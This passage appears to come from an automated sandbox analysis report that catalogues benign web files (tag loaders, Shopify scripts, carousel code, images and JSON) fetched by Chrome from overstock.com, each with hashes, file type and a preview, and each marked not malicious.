                                                                                                                                                                                    SHA-512:25AF1F15B958577C917CBA09C93BE6D202DC965BDBD93D27682A2E29A53A2850481EC6F9F26E85815BC9DA3B30C1D0E4FA0CD3601573B8567F90D0C9775FE67C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..................................................................................G..0.........cYb.l...1y...M.5..h.~...l.]6Y}D..mW n-Xe..[.G.F}.;s..[..w5L.....*.J.....m.@.u...kw^#g....m.....P..L9u....:sH......c.".."
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (20803)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):249029
                                                                                                                                                                                    Entropy (8bit):5.417862003761508
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:p8fVpsy2MPSLXHljPlo20Q6zsDdomIqiOdi9:pKVpKXHlj950ODdomji9
                                                                                                                                                                                    MD5:18C1F01E1E3A152F49FD0D07502F75D5
                                                                                                                                                                                    SHA1:8907076A7DC03C964A331D320C1074E44683F933
                                                                                                                                                                                    SHA-256:F6110C0B179196505B95F11372F577F4A9F1FDB2976A915C891591FD2C51054A
                                                                                                                                                                                    SHA-512:2C75FFF0F4D632528EFB9A9FFB088C590B043AB76A61BDE997254C534DBFA40426BA9C0F8E4A5925A588E7D4AF871E0D9873616E2BF20F954C067F3AB9CAE7BD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/utag.prod.f6110c0b179196505b95f11372f577f4a9f1fdb2976a915c891591fd2c51054a.js
                                                                                                                                                                                    Preview://tealium universal tag - utag.loader ut4.0.202409301659, Copyright 2024 Tealium.com Inc. All Rights Reserved..var utag_condload=false;window.__tealium_twc_switch=false;if(typeof utag=="undefined"&&!utag_condload){var utag={id:"overstock.main",o:{},sender:{},send:{},rpt:{ts:{a:new Date()}},dbi:[],db_log:[],loader:{q:[],lc:0,f:{},p:0,ol:0,wq:[],lq:[],bq:{},bk:{},rf:0,ri:0,rp:0,rq:[],ready_q:[],sendq:{"pending":0},run_ready_q:function(){for(var i=0;i<utag.loader.ready_q.length;i++){utag.DB("READY_Q:"+i);try{utag.loader.ready_q[i]()}catch(e){utag.DB(e)};}},lh:function(a,b,c){a=""+location.hostname;b=a.split(".");c=(/\.co\.|\.com\.|\.org\.|\.edu\.|\.net\.|\.asn\.|\...\.jp$/.test(a))?3:2;return b.splice(b.length-c,c).join(".");},WQ:function(a,b,c,d,g){utag.DB('WQ:'+utag.loader.wq.length);try{if(utag.udoname&&utag.udoname.indexOf(".")<0){utag.ut.merge(utag.data,window[utag.udoname],0);}.if(utag.cfg.load_rules_at_wait){utag.handler.LR(utag.data);}}catch(e){utag.DB(e)};d=0;g=[];for(a=0;a<utag.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (3113)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):97148
                                                                                                                                                                                    Entropy (8bit):4.816769827704925
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:2iVgjKXNLOiMzqTTlANlKdAblBBACksWFwcPxibCu+BxvDp0:SjKXNLOiMzrBAwIwcPWsxvG
                                                                                                                                                                                    MD5:D571B59F501ABBB47EC750139120C900
                                                                                                                                                                                    SHA1:BBC390CF4E067312F5BDB9B292CFFAB9C716CE69
                                                                                                                                                                                    SHA-256:B68BD76B43B3E896AD523C8706A7F7341ABF1429B4582737860F038DAB7D6396
                                                                                                                                                                                    SHA-512:A4D64B0651BF7F50594547FEBAFC6D38C0CD85207707646D9C950F0F0713BF2729E5214EBD1EE068DE2E20382D47B77503AB0B17B7F9A2960421CDF9B5F05BFE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/extensions/162002f6-08d7-4b02-b4ce-48655f8f0c90/kite-free-gift-discounts-409/assets/customDiscountLogic.js
                                                                                                                                                                                    Preview:console.log("inside customDiscount.js");..const BXGY_ICONS = {. DISCOUNT_TAG_ICON_FILL : `<svg xmlns="http://www.w3.org/2000/svg" width="40" height="40" viewBox="0 0 40 40" fill="none">.<path fill-rule="evenodd" clip-rule="evenodd" d="M20.2835 5.83398C21.4002 5.83398 22.4502 6.26732 23.2335 7.05065L32.7502 16.5673C34.6502 18.4673 34.6502 21.534 32.7502 23.434L23.4335 32.7507C21.5168 34.6673 18.4335 34.634 16.5668 32.7507L7.05016 23.234C6.26683 22.434 5.8335 21.4007 5.8335 20.284V9.51732C5.8335 7.48398 7.4835 5.83398 9.51683 5.83398H20.2835ZM20.1002 13.6507C19.1335 12.684 17.5335 12.684 16.5668 13.6507C15.6002 14.6173 15.6002 16.2173 16.5668 17.184C17.5335 18.1673 19.1168 18.1507 20.1002 17.184C21.0668 16.2173 21.0668 14.6173 20.1002 13.6507ZM10.0002 10.834C10.0002 11.3007 10.3668 11.6673 10.8335 11.6673C11.3002 11.6673 11.6668 11.3007 11.6668 10.834C11.6668 10.3673 11.3002 10.0007 10.8335 10.0007C10.3668 10.0007 10.0002 10.3673 10.0002 10.834ZM19.9002 26.3507C20.8835 27.334 22.4668 27
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):38303
                                                                                                                                                                                    Entropy (8bit):7.968670357565545
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:Q2+cO0MAVVlrtWWhl9ExrbcJLJ3LoY0ohAAtM19kycUgj3mkS/RynmG52HXu:gcJdRW7Rb4t3xLClkrU1/Cm46e
                                                                                                                                                                                    MD5:6BD39A88406AB6D7D5DDA2B51A09C8A3
                                                                                                                                                                                    SHA1:15BC106E7DC7D40EF05621060E639F84D426D1D8
                                                                                                                                                                                    SHA-256:032F0DC974BE3137352C4EBF0C5640845FB184312BAA5D2940D6B753D0A3FF8D
                                                                                                                                                                                    SHA-512:BEBBCFD48E4A28ED2F94B0A698BC2A537A4A112A919755C620B2F04862ECE467AE36886FC9AF7E0E87687160C442011DBE76224934C7B4A04EB1A43993AFF540
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@....................................................................................Z=..F.x.....;.1.UQ.T.....:\.&|W..6........=..c>..::N..j..... ...Z.....8/hx?...|9....o=k.T......@..#.....9...~yW.0.\.s..3......
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1180
                                                                                                                                                                                    Entropy (8bit):4.745542787113981
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:YMIfkbCLdv3Af18lLMq/qLhGqjtALoOvCLXw9LxAeLNpGLtAVL2BqILV:YBQCLSWlLiLXtAL3aLA9LxvLNkLQL2BZ
                                                                                                                                                                                    MD5:F336E3D8CA0506B893234F0E16EEA0B4
                                                                                                                                                                                    SHA1:9209A345D8C217F8CAF8E8AAFC3B968BD1DC0A52
                                                                                                                                                                                    SHA-256:2C57BCE932F79CEB398541E8079EADA3EEC685499E6A8B918BEA2DA19ED66CDF
                                                                                                                                                                                    SHA-512:0791038507F86646D481B8FAE6679CF35CED406520415ED7F12ADC963349248C90FF80945ADDAB177DC3A14C37318F8A39B878AF256C183B549CAAD2F10FCB49
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"33095218","rollup":{"average_rating":4.66,"rating_count":35,"review_count":35,"answered_questions":0}},{"page_id":"34117129","rollup":{"average_rating":4.53,"rating_count":45,"review_count":45,"answered_questions":0}},{"page_id":"35804400","rollup":{"average_rating":4.47,"rating_count":36,"review_count":36,"answered_questions":0}},{"page_id":"36369010","rollup":{"average_rating":4.07,"rating_count":57,"review_count":57,"answered_questions":0}},{"page_id":"36208089","rollup":{"average_rating":4.32,"rating_count":87,"review_count":87,"answered_questions":0}},{"page_id":"37000327","rollup":{"average_rating":3.91,"rating_count":58,"review_count":58,"answered_questions":0}},{"page_id":"37938467","rollup":{"average_rating":4.9,"rating_count":20,"review_count":20,"answered_questions":0}},{"page_id":"39904157","rollup":{"average_rating":4.92,"rating_count":13,"review_count":13,"answered_questions":0}},{"page_id":"9621326","rollup":{"average_rating":4.39
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (61318)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):63548
                                                                                                                                                                                    Entropy (8bit):5.513992669525927
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:qYWvuPAadRXadFil26aAn7t2npMvCm+uGYD8BQrEWvyElVlqZw4aN8uDvz6TCLIc:qYW2Pj5yO7t2ACRg83984zo
                                                                                                                                                                                    MD5:0B3AA139FB0B091A43C7BC50F6CB3BBF
                                                                                                                                                                                    SHA1:04686CC4BB3A7FD4D0C748A4409C610E9548897B
                                                                                                                                                                                    SHA-256:0060A5C23A9B264CB43004135839FFF956C9B79EAB5742447E67DFEB9368144E
                                                                                                                                                                                    SHA-512:2C1E5D73F55A48CA782B76983FE734E7FBC43D43FBF6E2FF89268D527E18727BCEC082368B45F4F6F934B6D73116B7C8BA8C36A14BF904C1AA36761486668C99
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-26050719@9/sandbox/modern/products/mia-oversized-modular-sectional-fabric-sofa-38169103?variant=50892052725919&searchidx=0
                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8">. <title>Web Pixels Manager Sandbox</title>. <script type="text/javascript">. (()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));va
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):373
                                                                                                                                                                                    Entropy (8bit):5.272528250576446
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:YYriyauoX6ghisuxO9vSAsRsGdewoBVwoBBCLbiBbV9I4ebCmIA4XiYHj1w5k6B0:YuiyuLhXMg3GdewSwGI/b7YJw5l6Xt
                                                                                                                                                                                    MD5:46CE86076B2E43E05614A25D16267870
                                                                                                                                                                                    SHA1:9130306573D8FFA62F566E5229F80A88EBD65766
                                                                                                                                                                                    SHA-256:3C03ACD060C7AE14EAC42680817A5E7049FAA7E9CEA7D58F3BDB70803C19A917
                                                                                                                                                                                    SHA-512:FA7DDA03556E19D3BDC2057E7E419972D0E827BDFA49F7BE7652C0993A8A1D4C3FD16E0E6A972B275DBC51EE887F2F0CF15149F901A0EA6611456C48D79C0CF6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"token":"Z2NwLXVzLWNlbnRyYWwxOjAxSkJFU0dEWkdINDZBSEZYMEVRVzVaMlY5?key=5a4839ec46c3efa4ee92609d5efe42e6","note":"","attributes":{},"original_total_price":0,"total_price":0,"total_discount":0,"total_weight":0.0,"item_count":0,"items":[],"requires_shipping":false,"currency":"USD","items_subtotal_price":0,"cart_level_discount_applications":[],"items_changelog":{"added":[]}}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):6628
                                                                                                                                                                                    Entropy (8bit):4.739154030964975
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:5BiQYCZUjJ4UYBxEGiU8ZqglZP4iN8lswXRrkuNzeAJivUMq:5sGUqUeFgBJ9MCQ0vu
                                                                                                                                                                                    MD5:F9606CB9F5ED1FD407BAC730355A6013
                                                                                                                                                                                    SHA1:8069BCD1F16BCD1C807886C87F14CE6B1E635AFC
                                                                                                                                                                                    SHA-256:01B5E4649BE7E134E963A189DE21F3B04DE8D5AEBC3E28B399858FA5025DF322
                                                                                                                                                                                    SHA-512:64F049EE9F85BA47DC18910991DD40EA59F911A4BF0DAB16DC1496CE0A0C58B631951E968C7A1C501F6861CA55559E8E057987F5C7F4E5B1275F6518089D611D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/proxy/3b78d0c73fafccdc56f608bc60a9d06abec748d32dc6f56c8c07955673068d06/r4.cloud.yellow.ai/api/galaxy/genericIntegration/shopify-sdk/x1711463078876/overstock_production?id=BcOZghlvRm/xDQ%2B5JyfxeLa8DrKFvlDs8l8ARsN2MrA=&shop=a37a28-2.myshopify.com&sp-cache-control=cHVibGljLCBtYXgtYWdlPTkwMA
                                                                                                                                                                                    Preview:function getCookieValue(key) {. const cookies = document.cookie.split(';'). for (let i = 0; i< cookies.length; i++) {. const cookie = cookies[i].trim(); // localization=IN. if(cookie.startsWith(key + '=')) {. return cookie.substring(key.length + 1). }. }. return false;. }. // Function to generate a new session ID. function generateSessionId() {. const timestamp = Date.now();. const randomString = Math.random().toString(36).substring(2);. const sessionId = `ym_${timestamp}_${randomString}`;. return sessionId;. }. . // Function to get fetch cart details.. function fetchCartData() {. return window.fetch(`${window.location.origin}/cart.js`). .then(res => res.clone().json()). .catch( err => console.log()). }. function sendEvent(data, eventName) {. const urlDetails = {"botId":"x1711463078876","customer":"overstock_production","id":"BcOZghlvRm%2FxDQ%2B5JyfxeLa8DrKFvlDs8l8ARsN2MrA%3D","origin":"r4.cloud.yellow.ai"} .
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):134761
                                                                                                                                                                                    Entropy (8bit):5.614825900808159
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:6brcpE+pvZtw3RPeFm9LXTyM+BptnYPnXX:6XcZpjsRPeEpXJ+Bptm
                                                                                                                                                                                    MD5:5BCE610DE3D1B675642BCD2EE1FB3FCD
                                                                                                                                                                                    SHA1:D67FF571F6CA7184CEBC783FDB2E829FAE6A79CB
                                                                                                                                                                                    SHA-256:708F3E7EFB0102FC00A285BB10F33A09E1F77FAF4C851FBEEB1DFDA40CD70A74
                                                                                                                                                                                    SHA-512:58708CE4A9D2D6FAE9D305B6B85FB58107044568408EA4CC816FE6375D25FAD2AD8475FB4FA33809C2A66D4C73CC85717EFA1350EBC21FEFFFBDBB41840A445B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/homepage/_next/static/chunks/pages/main-4d3627b5fb2c9f5d.js
                                                                                                                                                                                    Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[671],{8980:function(e,t,r){"use strict";r.r(t),r.d(t,{__N_SSP:function(){return Kn},default:function(){return Xn}});var n=r(7812),o=r(9499),i=r(7294),a=function(e,t){return e.filter((function(e){var r,n,o,i,a,l,s;return(null===e||void 0===e||null===(r=e.node)||void 0===r||null===(n=r.site_test)||void 0===n?void 0:n.is_sitetest)&&(null===t||void 0===t||null===(o=t[null===e||void 0===e||null===(i=e.node)||void 0===i||null===(a=i.site_test)||void 0===a?void 0:a.st_char])||void 0===o?void 0:o.segment)===(null===e||void 0===e||null===(l=e.node)||void 0===l||null===(s=l.site_test)||void 0===s?void 0:s.st_var)}))[0]||e[0]},l=r(3802),s=r.n(l),c=r(5893);function d(e){var t=e.children;try{return(0,c.jsx)("main",{className:s().main,id:"home-page",children:t})}catch(r){return console.error("SSR COMPONENT FAILED. COMPONENT: Main, ERROR: ".concat(r)),null}}d.displayName="Main";var u=r(7191),p="HP",h="CartMod";function m(){var e=arguments.lengt
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1034)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1035
                                                                                                                                                                                    Entropy (8bit):5.012195257175598
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:IHvraY2CDcYpAJrYwBQLWxwyHo39MOo4/4+FnZWyLWss5:q2CjpAJkO/aMOD/5y
                                                                                                                                                                                    MD5:FEBA970738E534FD43162CFB19D41952
                                                                                                                                                                                    SHA1:FAA9D5B4AC3ED55A1A420DE50AC1D1595B6CA585
                                                                                                                                                                                    SHA-256:FC3577CA402B2AE1AD90260A383062510963F599FB68D969DA0D1486AE5FD5BE
                                                                                                                                                                                    SHA-512:AEBB5A73D2869068F93C0CB9D20A09330E6D2B3E0D8B2D2615D66924769D650FDB39E3AF068A33274AC1AD1B21EFA703AFA4F85408144F900629710DE2DE97B2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/Rollup.o9Mx-fKL.css
                                                                                                                                                                                    Preview:[dir=ltr] ._7Vwjr{text-align:left}[dir=rtl] ._7Vwjr{text-align:right}._7Vwjr{position:relative;line-height:var(--x-spacing-large-200);transition:opacity var(--x-duration-fast) var(--x-timing-ease-out)}.tq3Uk{padding-top:var(--x-spacing-small-400)}.oNgGT{transition:opacity var(--x-duration-fast) var(--x-timing-ease-out)}.n5gP0{font-weight:var(--x-typography-primary-weight-base);font-size:var(--x-typography-size-default)}.n5gP0>button:focus-visible{outline:none;border-radius:var(--x-global-border-radius, var(--x-border-radius-base))}.n5gP0>button:active .wSTmt span,.n5gP0>button:focus-visible .wSTmt span{color:var(--x-default-color-accent)}@media (hover: hover){.n5gP0:hover .wSTmt span{color:var(--x-default-color-accent)}}.n5gP0 span._7tqW8{margin-top:calc(var(--x-spacing-base) * -1)}@media screen and (min-width: 1000px){.gxa2t{border-radius:var( --x-control-border-radius, var(--x-global-border-radius, var(--x-border-radius-base)) );background-color:var( --x-default-color-accent-foregrou
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (27586)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):76308
                                                                                                                                                                                    Entropy (8bit):5.121941798929058
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:No2mJy+LTVAtiTO260aZCX5J7wqCeys1jzIvbAJdJb2AZzWqF4xpkbe+8ZEPkwLZ:NoYGZTTfLJb20zWqF4/kbe+8Va
                                                                                                                                                                                    MD5:517D6C00EC87B6B88AD15327F885B936
                                                                                                                                                                                    SHA1:6BC58936FC2C9EA88A41096607D755DAF2B9816B
                                                                                                                                                                                    SHA-256:982475B3A1A336D50AF3550801E6182A628518D603514E5269431AB454E7FA7A
                                                                                                                                                                                    SHA-512:6A3F90AED331DEC56067CE7F76D5E865559318CBA24EFF3F76683B49E61611F74A96631BC28A4BB3659B905B188087C653D75E348939209798EFA05BB38D1E2B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/flickity.pkgd.js?v=174443963530233707351730157903
                                                                                                                                                                                    Preview:/*!. * Flickity PACKAGED v2.3.0. * Touch, responsive, flickable carousels. *. * Licensed GPLv3 for open source use. * or Flickity Commercial License for commercial use. *. * https://flickity.metafizzy.co. * Copyright 2015-2021 Metafizzy. */(function(window2,factory22){typeof define=="function"&&define.amd?define("jquery-bridget/jquery-bridget",["jquery"],function(jQuery){return factory22(window2,jQuery)}):typeof module=="object"&&module.exports?module.exports=factory22(window2,require("jquery")):window2.jQueryBridget=factory22(window2,window2.jQuery)})(window,function(window2,jQuery){"use strict";var arraySlice=Array.prototype.slice,console2=window2.console,logError=typeof console2=="undefined"?function(){}:function(message){console2.error(message)};function jQueryBridget(namespace,PluginClass,$){if($=$||jQuery||window2.jQuery,!$)return;PluginClass.prototype.option||(PluginClass.prototype.option=function(opts){$.isPlainObject(opts)&&(this.options=$.extend(!0,this.options,opts))}),$.fn[
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):163
                                                                                                                                                                                    Entropy (8bit):5.335116588616875
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:US9i3USqmKcDXRvFqMPfFQTcZ+1RyUFvNFBIADNHG2JCYWAJDE2JCn+9VRNkTSQ1:UXUoKf8fFGpbdvvB91DMKM+3rkGtSH42
                                                                                                                                                                                    MD5:B37ADEFE65A46E831684783E83EDAEF9
                                                                                                                                                                                    SHA1:CF24CBDE1D7CFE1773CE1F0131973DB90F72B0CA
                                                                                                                                                                                    SHA-256:E4038D5B0B549B4FE73AC5450618E0B45AC1251CE9980DF6BDCDB61A43BA6140
                                                                                                                                                                                    SHA-512:5A975DD2A54EB951930275876CDF35D1DB3237B312B6C52988BAB9897BBA2587585025BC42C6B1E79F52560A1D843913BB5F15E3DD6A6DE5B9CC7C4F4632F996
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ui.powerreviews.com/tag-builds/10461/4.1/js/chunks/760.js
                                                                                                                                                                                    Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */."use strict";(self.pwrClg=self.pwrClg||[]).push([[760],{52760:(s,l,r)=>{r.r(l)}}]);
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 50 x 93, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):61
                                                                                                                                                                                    Entropy (8bit):4.068159130770306
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:yionv//thPl9Ggskkxl/k4E08up:6v/lhPugskk7Tp
                                                                                                                                                                                    MD5:E0863912F97D44D1A082536ED5C1846B
                                                                                                                                                                                    SHA1:F1EE18E2DA26D0D39031FF1E2E541F68D6B6EFF0
                                                                                                                                                                                    SHA-256:6F0DD3D856B7392E8E2D24524CD2513F0948EDE5BFEFA65D179A801B34B097DB
                                                                                                                                                                                    SHA-512:A4D8CD5E7246F64F392776B2DC4D33D9D35AF42B758696A612A8AFC81BFA4AB1A4BB79AA6648207E4559CD74D603A40CD104933EB8C7975A87307B0CCBC82E3E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.PNG........IHDR...2...].....h..i....IDAT.....$.....IEND.B`.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):337388
                                                                                                                                                                                    Entropy (8bit):5.608631424920598
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:24ozGbgBu2ork2639cM8Gp/t2Wgtu9BW24nO3:foccu2oregAE8
                                                                                                                                                                                    MD5:C297C9EB237B6BF9708F9091C4488371
                                                                                                                                                                                    SHA1:7F39D0A77F8B6D314F0CBA90386FE811749ABF18
                                                                                                                                                                                    SHA-256:CF50C08650B3A92587C6C078E1E9591567C0C5182EE5219C8796E8D0475EBE02
                                                                                                                                                                                    SHA-512:BD66C9D3333DB24D77F8C39BF9A91D90DD817021FD6851B50E02D9DA3BC580679F94D2C8CEFA054044A5436E0CD9C08F5066AF8AA37A552AE1E93B0E4EF90A3D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":14,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"",
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1032x1032, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):50814
                                                                                                                                                                                    Entropy (8bit):7.9152367431129695
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:lU6zRd1cwJoRPZ70mQNWuOnn3TYy2KN+XyL:rztcwiXYsuOn3k9iL
                                                                                                                                                                                    MD5:F7DC16C2F5E4B9E4DEB7E9B2AAEEDB5C
                                                                                                                                                                                    SHA1:B4A54E05F31E74498D7BE7A713BA1EACB9D49E83
                                                                                                                                                                                    SHA-256:D33CA41F4C22D727FCDD278911073E8B8A28FE1352D7AD7490A1BA06CC159015
                                                                                                                                                                                    SHA-512:599518651D12C0595C198A4BA384FA6AAABD40FE60ABE5D8D5A0AD531395601216D717CD9C1258DF87E474009DEEFFD9E44016AAD396DF044E9320032B089296
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......JFIF..............................................&.#. . .#.&.:.*.-.*.-.*.:.X.7.@.7.7.@.7.X.N._.M.H.M._.N...n.b.b.n...........................C.C..................................&.#. . .#.&.:.*.-.*.-.*.:.X.7.@.7.7.@.7.X.N._.M.H.M._.N...n.b.b.n...........................C.C............."..........2...........................................................................................................................................................................................................................................................................................7...?\..D........................................CQ>.<6G...b{.|f....I.*.4..<x...\.Q.g$z+|.....Q...^F..+..kg..z./.G....G.....^...<....+..idm.@................................x..9u......Vhc.....$.ScR'$...YO%..Q.spi.%..3MR.&.."..V.1.Q&.S16..k1.........^{.J..............................><Sg]:...Y.g.@.p(._....)YU~....0.&.q.....-m.&.B.3J..ul`U.=g0.Z.A..;............k.^...............................
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
